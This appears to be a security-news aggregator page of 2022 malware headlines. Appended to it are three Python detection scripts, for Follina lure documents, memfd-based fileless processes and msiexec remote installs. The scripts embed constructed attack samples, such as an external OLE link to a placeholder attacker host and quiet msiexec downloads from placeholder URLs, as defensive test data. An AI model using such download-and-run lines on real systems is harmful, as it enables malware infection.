What's new around the internet

Src | Date (GMT) | Title | Description | Tags
SecurityAffairs | 2022-08-21 23:56:05 | Fake DDoS protection pages on compromised WordPress sites lead to malware infections | Threat actors compromise WordPress sites to display fake Cloudflare DDoS protection pages that distribute malware. DDoS protection pages are the browser checks performed by WAF/CDN services to verify that a site visitor is a human rather than a bot. Security researchers at Sucuri recently spotted JavaScript injections on WordPress sites that display fake DDoS protection pages […] | Tags: Malware
SecurityAffairs | 2022-08-21 08:35:30 | Grandoreiro banking malware targets Mexico and Spain | A new Grandoreiro banking malware campaign is targeting organizations in Mexico and Spain, Zscaler reported. Zscaler ThreatLabz researchers observed a Grandoreiro campaign targeting organizations in the Spanish-speaking countries of Mexico and Spain. Grandoreiro is a modular backdoor with the following capabilities: keylogging, auto-updating to newer versions and modules, web injects, and restricting access to specific […] | Tags: Malware
SecurityAffairs | 2022-08-20 08:28:30 | TA558 cybercrime group targets hospitality and travel orgs | The TA558 cybercrime group is behind a malware campaign targeting hospitality, hotel, and travel organizations in Latin America. Researchers from Proofpoint are monitoring a malware campaign conducted by a cybercrime group, tracked as TA558, that targets hospitality, hotel, and travel organizations in Latin America. The group is a small cybercrime actor that has been […] | Tags: Malware Threat
SecurityAffairs | 2022-08-19 09:04:18 | Cisco fixes high-severity bug in Secure Web Appliance | Cisco addressed a high-severity privilege escalation vulnerability (CVE-2022-20871) in AsyncOS for Cisco Secure Web Appliance. Cisco Secure Web Appliance (formerly Web Security Appliance, WSA) offers protection from malware and web-based attacks and provides application visibility and control. The vulnerability, tracked as CVE-2022-20871, resides in the web management interface of AsyncOS for Cisco Secure Web […] | Tags: Malware Vulnerability
SecurityAffairs | 2022-08-17 08:31:52 | North Korea-linked APT targets job seekers with macOS malware | The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware that runs on both Intel and Apple M1 systems. ESET researchers continue to monitor a cyberespionage campaign, tracked as “Operation In(ter)ception,” that has been active since at least June 2020. The campaign targets employees working in the aerospace and military sectors and leverages […] | Tags: Malware Medical APT 38
SecurityAffairs | 2022-08-16 08:15:55 | Russia-linked Gamaredon APT continues to target Ukraine | The Russia-linked Gamaredon APT group targets Ukrainian entities with a PowerShell info-stealer dubbed GammaLoad. Gamaredon (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) is targeting Ukrainian entities with the PowerShell info-stealer GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and Trend Micro first discovered the Gamaredon […] | Tags: Malware
SecurityAffairs | 2022-08-15 15:22:28 | SOVA Android malware now also encrypts victims' files | Security researchers from Cleafy report that the SOVA Android banking malware is back and evolving rapidly. The SOVA Android banking trojan has been improved with a new ransomware feature that encrypts files on Android devices, Cleafy researchers report. The malware has been active since 2021 and evolves over time. The latest version of the […] | Tags: Ransomware Malware
SecurityAffairs | 2022-08-15 08:16:31 | A new PyPI package was found delivering fileless Linux malware | Security researchers discovered a new PyPI package designed to drop a fileless cryptominer on Linux systems. Sonatype researchers found a PyPI package named ‘secretslib’ that drops a fileless cryptominer into the memory of Linux systems. The package describes itself as “secrets matching and verification made easy” and had a total of 93 downloads since […] | Tags: Malware
SecurityAffairs | 2022-08-06 20:46:41 | Greek intelligence service used surveillance malware to spy on a journalist, Reuters reports | Greek intelligence admitted it had spied on a journalist, while citizens ask the government to disclose its use of surveillance malware. The head of the Greek intelligence service told a parliamentary committee that the agency had spied on a journalist with surveillance malware, Reuters reported, citing two sources present. The revelation comes while media and journalists are […] | Tags: Malware
SecurityAffairs | 2022-08-04 19:13:13 | New Woody RAT used in attacks aimed at Russian entities | An unknown threat actor is targeting Russian organizations with a new remote access trojan called Woody RAT. Malwarebytes researchers observed the attackers delivering the malware via archive files and Microsoft Office documents exploiting the Follina Windows flaw (CVE-2022-30190). The assumption […] | Tags: Malware Threat
SecurityAffairs | 2022-08-02 07:44:54 | Gootkit AaaS malware is still active and uses updated tactics | Gootkit access-as-a-service (AaaS) malware is back with updated tactics and fileless delivery of Cobalt Strike beacons. Gootkit runs on an access-as-a-service model; different groups use it to drop additional malicious payloads on compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt and REvil (Sodinokibi) ransomware and the Kronos trojan, […] | Tags: Malware
SecurityAffairs | 2022-07-29 13:55:57 | Microsoft experts linked the Raspberry Robin malware to Evil Corp operation | Microsoft linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation. On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary; the malware propagates through removable USB devices. The malicious code […] | Tags: Malware
SecurityAffairs | 2022-07-29 08:06:44 | (Déjà vu) Malware-laced npm packages used to target Discord users | Threat actors used multiple npm packages to target Discord users with malware designed to steal their payment card data. A malicious campaign targeting Discord users leverages multiple npm packages to deliver malware that steals payment card information, Kaspersky researchers warn. The malicious code hidden in the packages, tracked as Lofy Stealer, is a […] | Tags: Malware
SecurityAffairs | 2022-07-28 11:04:36 | European firm DSIRF behind the attacks with Subzero surveillance malware | Microsoft linked a private-sector offensive actor (PSOA) to attacks using multiple zero-day exploits to deploy its Subzero malware. Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) researchers linked a threat group known as Knotweed to an Austrian surveillance firm named DSIRF, known for using multiple Windows and Adobe zero-day exploits. The […] | Tags: Malware Threat
SecurityAffairs | 2022-07-26 16:14:12 | Threat actors leverage DLL side-loading to spread Qakbot malware | Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security researcher ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that leverages the Windows 7 Calculator app for DLL side-loading attacks. Dynamic-link library (DLL) side-loading is an attack technique that takes advantage of how Microsoft Windows applications handle DLL […] | Tags: Malware
SecurityAffairs | 2022-07-25 23:10:18 | CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China | Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky spotted a UEFI firmware rootkit, named CosmicStrand, attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […] | Tags: Malware Threat
SecurityAffairs | 2022-07-25 06:27:21 | Amadey malware spreads via software cracks laced with SmokeLoader | Operators behind the Amadey Bot malware are using SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is data-stealing malware first spotted in 2018 that also allows operators to install additional payloads. The malware is sold on underground forums; in the past it was used […] | Tags: Malware
SecurityAffairs | 2022-07-22 05:45:39 | (Déjà vu) TA4563 group leverages EvilNum malware to target European financial and investment entities | A threat actor tracked as TA4563 is using EvilNum malware to target European financial and investment entities, Proofpoint reported. The group focuses on entities with operations supporting foreign exchange, cryptocurrency, and decentralized finance (DeFi). EvilNum is a […] | Tags: Malware Threat
SecurityAffairs | 2022-07-21 20:20:16 | Threat actors target software firm in Ukraine using GoMet backdoor | Threat actors targeted a large software development company in Ukraine using the GoMet backdoor. Researchers from Cisco Talos discovered an uncommon piece of malware employed in an attack against a large Ukrainian software development company whose software is used by various state organizations in Ukraine. Researchers believe that […] | Tags: Malware
SecurityAffairs | 2022-07-21 17:37:51 | Lightning Framework, a previously undetected malware that targets Linux systems | Researchers from Intezer discovered a previously undetected malware, tracked as Lightning Framework, that targets Linux systems. The malicious code has a modular structure and is able to install rootkits. “Lightning Framework is a new undetected Swiss Army Knife-like Linux malware that has […] | Tags: Malware
SecurityAffairs | 2022-07-19 20:07:23 | CloudMensis spyware went undetected for many years | Researchers from ESET discovered a previously undocumented macOS backdoor, dubbed CloudMensis, that exclusively uses public cloud storage services as its C2. The malware was designed to spy on target systems, exfiltrate documents, log keystrokes, and capture screenshots. […] | Tags: Malware
SecurityAffairs | 2022-07-19 08:44:47 | Several apps on the Play Store used to spread Joker, Facestealer and Coper malware | Google removed dozens of malicious apps from the official Play Store that were distributing the Joker, Facestealer, and Coper malware families. Researchers from security firm Pradeo discovered multiple apps spreading the Joker Android malware. The […] | Tags: Malware
SecurityAffairs | 2022-07-13 18:29:04 | Qakbot operations continue to evolve to avoid detection | Experts warn that the operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot, and Pinkslipbot, is info-stealing malware that has been active since 2008. The malware spreads via malspam campaigns that inject replies into existing email threads. The threat continues to […] | Tags: Malware Threat
SecurityAffairs | 2022-07-09 10:04:58 | Ongoing Raspberry Robin campaign leverages compromised QNAP devices | Cybereason researchers are warning of a wave of attacks spreading the wormable Windows malware Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary; the malware propagates through removable USB devices. The malicious code uses Windows Installer (msiexec) to reach out to QNAP-associated domains and download a malicious DLL. The malware uses […] | Tags: Malware
SecurityAffairs | 2022-07-08 10:25:18 | Russian cybercrime TrickBot group is systematically attacking Ukraine | The operators behind the TrickBot malware have been systematically targeting Ukraine since the beginning of the war in February 2022. IBM researchers collected evidence indicating that the Russia-based cybercriminal TrickBot group (aka Wizard Spider, DEV-0193, ITG23) has been systematically attacking Ukraine since the beginning of the Russian invasion. Since February, the Conti ransomware […] | Tags: Ransomware Malware
SecurityAffairs | 2022-07-07 09:34:15 | OrBit, a new sophisticated Linux malware still undetected | Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed either as a volatile in-memory implant or with persistence on the compromised system. The malware implements advanced evasion […] | Tags: Malware
SecurityAffairs | 2022-07-06 09:38:38 | New Hive ransomware variant is written in Rust and uses an improved encryption method | Hive ransomware operators have improved their file-encrypting module by migrating to Rust and adopting a more sophisticated encryption method, Microsoft researchers warn. “The upgrades in the latest variant are effectively […] | Tags: Ransomware Malware
SecurityAffairs | 2022-07-05 07:44:27 | AstraLocker ransomware operators shut down their operations | AstraLocker ransomware operators told BleepingComputer they are shutting down the operation and have uploaded decryptors to the VirusTotal malware analysis platform. AstraLocker is based on the source code of the Babuk Locker (Babyk) ransomware that was leaked online in June 2021. BleepingComputer tested the […] | Tags: Ransomware Malware
SecurityAffairs | 2022-07-03 17:32:54 | Microsoft: Raspberry Robin worm already infected hundreds of networks | Microsoft announced that the Windows worm Raspberry Robin has already infected the networks of hundreds of organizations. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary; the malware propagates through removable USB devices. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The […] | Tags: Malware
SecurityAffairs | 2022-06-30 06:36:46 | YTStealer info-stealing malware targets YouTube content creators | Intezer researchers have detailed a new information-stealing malware, dubbed YTStealer, developed to steal authentication cookies from YouTube content creators. The malware is very likely offered as a service on the dark web. Upon execution, the malware performs some environment […] | Tags: Malware
SecurityAffairs | 2022-06-28 21:24:18 | ZuoRAT malware hijacks SOHO routers to spy on victims | A new RAT dubbed ZuoRAT was employed in a campaign aimed at small office/home office (SOHO) routers in North America and Europe. Researchers from Black Lotus Labs, the threat intelligence division of Lumen Technologies, discovered a new remote access trojan (RAT) called ZuoRAT that targets the SOHO devices of remote workers during COVID-19 […] | Tags: Malware Threat
SecurityAffairs | 2022-06-27 14:46:33 | New Matanbuchus campaign drops Cobalt Strike beacons | The Matanbuchus malware-as-a-service (MaaS) has been observed spreading through phishing campaigns and dropping Cobalt Strike beacons. Threat intelligence firm Cyble observed the MaaS, named Matanbuchus, in malspam attacks dropping Cobalt Strike beacons. Matanbuchus is a malware loader that first appeared on the threat landscape in February 2021, when it was offered for rent on Russian-speaking […] | Tags: Malware Threat
SecurityAffairs | 2022-06-27 10:23:24 | Ukrainian telecommunications operators hit by DarkCrystal RAT malware | The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. The malspam messages, with the subject “Free primary legal aid”, use a password-protected attachment “Algorithm of actions of […] | Tags: Malware
SecurityAffairs | 2022-06-23 18:40:55 | Chinese Tropic Trooper APT spreads a hacking tool laced with a backdoor | The China-linked APT group Tropic Trooper has been spotted using previously undocumented malware written in the Nim language. Check Point Research uncovered an activity cluster with ties to Tropic Trooper (aka Earth Centaur, KeyBoy, and Pirate Panda) that involved a previously undescribed loader (dubbed “Nimbda”) written in Nim. The Tropic Trooper APT has been active since at least […] | Tags: Malware Tool APT 23
SecurityAffairs | 2022-06-20 09:41:01 | BRATA Android malware evolves and targets the UK, Spain, and Italy | The developers behind the BRATA Android malware have implemented additional features to make their attacks stealthier and avoid detection. The malware was first spotted in 2019 by security experts at Kaspersky; the name BRATA comes from 'Brazilian RAT Android', because at the time it was used to […] | Tags: Malware
SecurityAffairs | 2022-06-18 06:47:02 | MaliBot Android banking trojan targets Spain and Italy | MaliBot is a new Android malware targeting online banking and cryptocurrency wallet customers in Spain and Italy. F5 Labs researchers spotted the new strain, which targets online banking and cryptocurrency wallet customers in Spain and Italy. The experts documented attacks against multiple banks, including UniCredit, Santander, CaixaBank, and CartaBCC. […] | Tags: Malware
SecurityAffairs | 2022-06-17 20:00:33 | Experts link Hermit spyware to Italian surveillance firm RCS Lab and a front company | Experts uncovered enterprise-grade surveillance malware dubbed Hermit, used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers uncovered the enterprise-grade Android spyware, named Hermit, used by the government of Kazakhstan to track individuals within the country. The researchers detected the latest samples of this spyware in April 2022, four […] | Tags: Malware Threat Cloud APT 37
SecurityAffairs | 2022-06-16 07:00:36 | Malicious apps continue to spread through the Google Play Store | Researchers at antivirus firm Dr. Web discovered malware in the Google Play Store that had been downloaded two million times. An investigation conducted by Dr. Web in May resulted in the discovery of multiple adware and information-stealing malware apps on the official Google Play Store. The experts warn that info-stealing trojans are the […] | Tags: Malware
SecurityAffairs | 2022-06-14 07:06:29 | SeaFlower campaign distributes backdoored versions of Web3 wallets to steal seed phrases | Chinese cybercriminals are spreading backdoored versions of iOS and Android Web3 wallets to steal users' seed phrases. Researchers from Confiant have uncovered a sophisticated malware campaign, tracked as SeaFlower, targeting Web3 wallet users. SeaFlower maintains the functionality […] | Tags: Malware
SecurityAffairs | 2022-06-10 14:37:16 | Experts spotted a new variant of the Cuba ransomware with optimized infection techniques | The Cuba ransomware operators are back and employed a new version of their malware in recent attacks. Cuba ransomware has been active since at least January 2020. Its operators run a data leak site where they post data exfiltrated from victims who refused to pay the ransom. The ransomware encrypts files on the targeted systems […] | Tags: Ransomware Malware
SecurityAffairs | 2022-06-09 08:48:41 | Tainted CCleaner Pro crack spreads via black SEO campaign | Threat actors spread info-stealing malware through the search results for a pirated copy of the CCleaner Pro Windows optimization program. Researchers from Avast have uncovered a malware campaign, tracked as FakeCrack, spreading through search results for a pirated copy of CCleaner Pro. The researchers pointed out that the operators behind the campaign […] | Tags: Malware CCleaner
SecurityAffairs | 2022-06-07 08:55:47 | Black Basta ransomware operators leverage QBot for lateral movement | The QBot malware operation has partnered with the Black Basta ransomware group to target organizations worldwide. Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware operation. Black Basta has been active since April 2022 and, like other ransomware operations, implements a double-extortion attack […] | Tags: Ransomware Malware Threat
SecurityAffairs | 2022-06-03 23:46:21 | LuoYu APT delivers WinDealer malware via man-on-the-side attacks | An “extremely sophisticated” China-linked APT tracked as LuoYu has been delivering malware called WinDealer via man-on-the-side attacks. Researchers from Kaspersky have uncovered the China-linked APT group, tracked as LuoYu, which has been observed using a malicious Windows tool called WinDealer. LuoYu has been active since at […] | Tags: Malware Tool
SecurityAffairs | 2022-05-30 07:09:17 | EnemyBot malware adds new exploits to target CMS servers and Android devices | The operators of the EnemyBot botnet added exploits for recently disclosed flaws in VMware, F5 BIG-IP, and Android systems. Operators behind the EnemyBot botnet are expanding the list of potential targets, adding exploits for recently disclosed critical vulnerabilities in VMware, F5 BIG-IP, and Android. The botnet was first discovered by Fortinet in March, the […] | Tags: Malware
SecurityAffairs | 2022-05-28 15:55:27 | Experts believe that Russian Gamaredon APT could fuel a new round of DDoS attacks | 360 Qihoo reported DDoS attacks launched by APT-C-53 (aka Gamaredon) using the open-source DDoS trojan LOIC. Researchers at 360 Qihoo observed a wave of DDoS attacks launched by the Russia-linked APT-C-53 (aka Gamaredon) group, conducted with the open-source LOIC DDoS tool. The instances of the malware spotted by the experts […] | Tags: Malware Threat
SecurityAffairs | 2022-05-28 15:02:13 | The strange link between Industrial Spy and the Cuba ransomware operation | The recently launched Industrial Spy data extortion marketplace has now started its own ransomware operation. In April, MalwareHunterTeam and BleepingComputer reported the launch of a new dark web marketplace called Industrial Spy that sells stolen data and offers free stolen data to its members. MalwareHunterTeam researchers spotted malware samples [1, 2] that drop the following wallpaper promoting […] | Tags: Ransomware Malware
SecurityAffairs | 2022-05-26 14:38:43 | Experts warn of a new malvertising campaign spreading the ChromeLoader | Researchers from Red Canary observed a new malvertising campaign spreading the ChromeLoader malware, which hijacks victims’ browsers. ChromeLoader is a malicious Chrome browser extension classified as a pervasive browser hijacker that modifies browser settings to redirect […] | Tags: Malware
SecurityAffairs | 2022-05-24 09:06:15 | Nation-state malware could become a commodity on dark web soon, Interpol warns | Interpol Secretary General Jurgen Stock warned that nation-state malware will become available on the cybercrime underground within a couple of years. In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non […] | Tags: Malware
SecurityAffairs | 2022-05-23 06:56:23 | Threat actors target the infosec community with fake PoC exploits | Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infosec community with a fake proof-of-concept (PoC) exploit that delivers a Cobalt Strike beacon. The experts discovered a post in which a researcher was sharing fake PoC exploit code for an RPC Runtime Library […] | Tags: Malware Threat
SecurityAffairs | 2022-05-18 14:37:54 | Microsoft warns of the rise of cryware targeting hot wallets | Microsoft researchers warn of the rising threat of cryware, malicious software used to steal information and funds from non-custodial cryptocurrency wallets, also known as hot wallets. Data stolen by this kind of malware includes private keys, seed phrases, and […] | Tags: Malware Threat
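The Woody RAT entry above notes that the lure documents exploit the Follina flaw (CVE-2022-30190). Follina documents carry the attack in the OOXML relationship part rather than in a macro: an oleObject relationship marked external that points at an attacker-hosted page, which in turn invokes the ms-msdt: handler. The following added example (not code from the page or from Malwarebytes) unzips a .docx in memory and flags such relationships; the sample documents are constructed inline and the host name is a placeholder, not a real indicator.

```python
"""Scan an Office document for Follina-style external OLE object relationships.

Added example for the Woody RAT entry (Office documents exploiting CVE-2022-30190);
this is not code from the page or from Malwarebytes. The .docx files below are
constructed in memory, and the remote target URL is a placeholder, not a real IoC.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Follina chains an external oleObject target (an http(s) page) into the ms-msdt: handler.
REMOTE_SCHEME = re.compile(r"^(https?|ms-msdt):", re.IGNORECASE)


def suspicious_relationships(docx_bytes):
    """Return (rels_part, target) pairs for oleObject relationships that leave the package.

    A benign embedded object is internal (Target="embeddings/oleObject1.bin").
    Follina lures mark the relationship TargetMode="External" and point Target at
    an attacker-hosted page, so either signal is enough to flag the part.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_TYPE:
                    continue
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "").lower() == "external"
                if external or REMOTE_SCHEME.match(target):
                    hits.append((part, target))
    return hits


def build_docx(rels_xml):
    """Build a minimal docx-like zip (constructed sample) carrying the given rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Constructed Follina-style part; attacker.invalid is a placeholder host.
FOLLINA_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_TYPE}" Target="http://attacker.invalid/lure.html!" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    print(suspicious_relationships(build_docx(BENIGN_RELS)))
    print(suspicious_relationships(build_docx(FOLLINA_RELS)))
```

Run it against real attachments by passing the file bytes to suspicious_relationships(); the check is cheap enough to sit in a mail gateway or a triage script, and it does not depend on the payload page still being online.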
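The secretslib PyPI entry above describes a cryptominer that is "fileless", running from memory on Linux. The page does not say how the payload is loaded; the added example below (not code from the page or from Sonatype) assumes the common Linux technique of executing from an anonymous memfd_create() file, which leaves /proc/<pid>/exe pointing at a "/memfd:<name> (deleted)" pseudo-path. The link targets in SAMPLE_LINKS are constructed.

```python
"""Find Linux processes whose executable exists only in memory (memfd-backed).

Added example for the secretslib PyPI entry (fileless cryptominer on Linux); not
code from the page or from Sonatype. It assumes the usual Linux "fileless" technique
of executing a payload from an anonymous memfd_create() file, which leaves
/proc/<pid>/exe pointing at "/memfd:<name> (deleted)". The link targets in
SAMPLE_LINKS are constructed, not captured.
"""
import os
import re

# readlink(/proc/<pid>/exe) for a memfd-backed process looks like "/memfd:name (deleted)"
MEMFD_EXE = re.compile(r"^/memfd:(?P<name>.*?) \(deleted\)$")


def memfd_name(exe_link):
    """Return the memfd name if the exe link target is memfd-backed, else None."""
    m = MEMFD_EXE.match(exe_link)
    return m.group("name") if m else None


def memfd_processes(proc_root="/proc"):
    """Yield (pid, memfd_name, cmdline) for live processes executing from a memfd.

    Needs root to read other users' /proc/<pid>/exe; unreadable or vanished
    processes are skipped rather than aborting the sweep.
    """
    if not os.path.isdir(proc_root):
        return
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue
        name = memfd_name(target)
        if name is not None:
            yield int(entry), name, cmdline


# Constructed examples of readlink() results and what the check should say about them.
SAMPLE_LINKS = {
    "/usr/bin/python3": None,                 # ordinary on-disk binary
    "/tmp/loader (deleted)": None,            # deleted on-disk file: suspicious, but not memfd
    "/memfd:payload (deleted)": "payload",    # anonymous in-memory executable
    "/memfd: (deleted)": "",                  # memfd created with an empty name
}


def check_samples():
    """Run the classifier over SAMPLE_LINKS; True if every expectation holds."""
    return all(memfd_name(link) == expected for link, expected in SAMPLE_LINKS.items())


if __name__ == "__main__":
    print("samples ok:", check_samples())
    for pid, name, cmdline in memfd_processes():
        print(f"pid {pid} runs from memfd:{name!r}: {cmdline}")
```

Some legitimate software (JIT runtimes, sandboxing helpers) also uses memfd, so treat a hit as a lead to pull the process's maps and network connections rather than as a verdict; an unexplained memfd-backed process with high CPU use is the pattern a miner leaves.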
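Both Raspberry Robin entries above state that the worm uses Windows Installer to reach QNAP-associated domains and download a DLL. Because msiexec.exe is a signed Microsoft binary, the command line, not the image, is what a detection has to examine: a local .msi install is routine, while a quiet install from an http(s) URL is not. The added example below (not code from the page, Red Canary, Cybereason or Microsoft) parses process-creation command lines for that pattern; the command lines, hosts and port are constructed placeholders, not real indicators.

```python
"""Flag Windows Installer (msiexec) launches that fetch a package from a remote URL.

Added example for the Raspberry Robin entries (the worm uses Windows Installer to
reach QNAP-associated domains and pull down a DLL); not code from the page, Red
Canary, Cybereason or Microsoft. The command lines in SAMPLE_CMDLINES are
constructed, and the hosts and port are placeholders, not real indicators.
"""
import re
import shlex
from urllib.parse import urlparse

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
QUIET_RE = re.compile(r"^[/-]q[nbrf!+\-]*$", re.IGNORECASE)  # /q, /qn, /qb, /qb-, ...
MSIEXEC_NAMES = {"msiexec", "msiexec.exe"}


def _basename(path):
    """Strip quotes and directories from argv[0], handling both slash styles."""
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def remote_msiexec(cmdline):
    """Return a finding dict if cmdline runs msiexec with an http(s) package, else None.

    Raspberry Robin's use of msiexec is a living-off-the-land download: the package
    is fetched by a trusted binary, so only the arguments give it away. Local .msi
    installs return None.
    """
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:
        argv = cmdline.split()
    if not argv or _basename(argv[0]) not in MSIEXEC_NAMES:
        return None
    urls = [a.strip('"') for a in argv[1:] if URL_RE.match(a.strip('"'))]
    if not urls:
        return None
    url = urlparse(urls[0])
    return {
        "url": urls[0],
        "host": url.hostname,
        "port": url.port,
        "quiet": any(QUIET_RE.match(a) for a in argv[1:]),   # no UI shown to the victim
        "nonstandard_port": url.port not in (None, 80, 443),
    }


# Constructed process-creation command lines (not captured telemetry).
SAMPLE_CMDLINES = [
    'msiexec.exe /q /i http://update.example.invalid:8080/pkg.msi',
    '"C:\\Windows\\System32\\msiexec.exe" /i "C:\\Users\\alice\\Downloads\\tool.msi" /qn',
    'MSIEXEC /QB /I https://cdn.example.invalid/setup.msi',
    'cmd.exe /c echo http://example.invalid',
]


def scan(cmdlines):
    """Return the findings for every command line that matches."""
    return [f for f in (remote_msiexec(c) for c in cmdlines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```

Feed it the CommandLine field from Sysmon event 1 or Windows event 4688; the quiet flag plus a non-standard port is the combination worth alerting on first, and the parent process (explorer.exe launched from a removable drive, in the USB-propagation case described above) is the natural next pivot.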
Last update at: 2024-05-13 19:07:57